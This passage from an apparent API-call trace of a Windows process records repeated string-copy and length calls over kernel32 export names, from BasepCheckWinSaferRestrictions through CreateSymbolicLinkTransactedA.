(lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.026] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.026] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.027] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.027] lstrlenA (lpString="BEEP") returned 4 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.027] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.027] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.027] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.027] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.027] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.027] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.027] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.027] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.027] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.027] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.027] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.027] lstrlenA (lpString="CANCELIO") returned 8 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.027] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.027] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.027] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.027] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.028] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.028] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.028] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.028] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.028] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.028] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.028] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.028] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.028] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.028] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.028] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.028] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.028] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.028] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.028] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.028] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.028] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.028] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.029] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.029] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.029] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.029] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.029] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.029] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.029] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.029] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.029] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.029] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.029] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.029] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.029] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.029] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.029] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.029] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.029] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.029] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.030] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.030] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.030] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.030] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.030] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.030] lstrlenA (lpString="COPYFILEA") returned 9 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.030] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.030] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.030] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.030] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.030] lstrlenA (lpString="COPYFILEW") returned 9 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.030] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.030] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.030] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.030] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.030] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.030] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.030] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.031] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.031] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.031] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.031] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.031] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.031] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.031] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.031] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.031] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.031] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.031] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.031] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.031] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.031] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.031] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.031] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.031] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.031] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.032] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.032] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.032] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.032] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.032] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.032] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.032] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.032] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.032] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.032] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.032] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.032] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.032] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.032] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.032] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.032] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.032] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.032] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.032] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.033] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.033] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.033] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.033] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.033] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.033] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.033] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.033] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.033] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.033] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.033] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.033] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.033] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.033] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.033] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.033] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.033] 